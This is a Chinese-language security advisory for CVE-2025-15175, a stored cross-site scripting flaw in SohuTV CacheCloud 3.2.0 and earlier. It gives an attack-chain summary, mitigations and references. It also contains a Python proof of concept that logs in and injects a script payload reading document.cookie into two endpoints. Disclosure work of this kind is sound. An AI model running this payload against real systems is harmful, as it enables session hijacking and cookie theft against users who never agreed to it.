CVE-2025-15175 SohuTV CacheCloud跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-15175

漏洞类型

跨站脚本(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SohuTV CacheCloud

漏洞概述

CVE-2025-15175是SohuTV CacheCloud系统中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞影响了CacheCloud 3.2.0及以下版本。漏洞位于Web控制器的AppController.java文件中的doAppList和appCommandAnalysis函数。由于应用程序对用户输入的清理和转义不充分，攻击者可以通过在特定功能模块中注入恶意JavaScript代码，当其他用户访问相关页面时，恶意脚本将在其浏览器上下文中执行。这可能导致会话劫持、敏感信息窃取或对用户进行钓鱼攻击。由于该漏洞已被公开披露且项目方尚未回应修复请求，建议用户采取临时防护措施或等待官方更新。

技术细节

该漏洞为存储型XSS，存在于SohuTV CacheCloud的AppController.java文件中的doAppList和appCommandAnalysis函数。攻击者通过在应用列表或应用命令分析功能处注入恶意JavaScript代码，由于服务器端未对用户输入进行充分的HTML实体转义，恶意代码被存储在数据库中。当其他用户访问受影响的功能页面时，服务器将未转义的恶意内容返回给客户端浏览器，导致JavaScript代码在用户浏览器中执行。攻击者可利用此漏洞窃取用户会话Cookie、进行钓鱼攻击或修改页面内容。由于漏洞需要低权限用户交互(UI:R)才能触发，攻击复杂度较低(AC:L)，但可远程利用(AV:N)。

攻击链分析

STEP 1

步骤1

攻击者使用低权限账户登录SohuTV CacheCloud系统

STEP 2

步骤2

攻击者构造恶意XSS payload并提交到doAppList或appCommandAnalysis功能点

STEP 3

步骤3

服务器未对输入进行充分过滤，将恶意脚本存储到数据库

STEP 4

步骤4

当其他用户访问受影响页面时，服务器返回包含恶意代码的页面

STEP 5

步骤5

受害者浏览器执行恶意JavaScript代码，导致Cookie窃取或会话劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-15175 PoC - SohuTV CacheCloud XSS
# Target: SohuTV CacheCloud <= 3.2.0
# Vulnerability: Stored XSS in AppController.java (doAppList/appCommandAnalysis)

TARGET_URL = "http://target.com"  # Replace with actual target
LOGIN_URL = f"{TARGET_URL}/login"
APP_LIST_URL = f"{TARGET_URL}/app/doAppList"
APP_CMD_URL = f"{TARGET_URL}/app/appCommandAnalysis"

# Login with low-privilege user
session = requests.Session()
login_data = {
    "username": "attacker",
    "password": "password"
}
session.post(LOGIN_URL, data=login_data)

# XSS Payload - Stored in doAppList function
xss_payload = "<script>alert(document.cookie)</script>"
app_list_data = {
    "appName": xss_payload,
    "appId": "12345"
}

# Inject XSS via app list
response = session.post(APP_LIST_URL, data=app_list_data)
print(f"XSS Injection Status (doAppList): {response.status_code}")

# Alternative injection via appCommandAnalysis
cmd_data = {
    "command": xss_payload,
    "instanceId": "1"
}
response = session.post(APP_CMD_URL, data=cmd_data)
print(f"XSS Injection Status (appCommandAnalysis): {response.status_code}")

# Verify XSS is stored and reflected
verify_url = f"{TARGET_URL}/app/doAppList"
response = session.get(verify_url)
if xss_payload in response.text:
    print("XSS vulnerability confirmed - payload stored and reflected")

影响范围

SohuTV CacheCloud <= 3.2.0

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时措施：1)禁用或限制受影响的功能模块访问权限；2)在Web应用防火墙(WAF)层面配置XSS防护规则；3)对所有用户输入实施严格的输入验证；4)对输出内容进行HTML实体编码转义；5)启用HttpOnly和Secure属性保护Cookie；6)实施Content-Security-Policy限制外部脚本执行。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15175
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15175
3 Details https://www.cvedetails.com/cve/CVE-2025-15175/
4 VulDB https://vuldb.com/cve/CVE-2025-15175
5 Link https://github.com/sohutv/cachecloud/issues/371
6 Link https://github.com/sohutv/cachecloud/issues/381
7 Link https://vuldb.com/?ctiid.338560
8 Link https://vuldb.com/?id.338560
9 Link https://vuldb.com/?submit.716309
10 Link https://vuldb.com/?submit.716322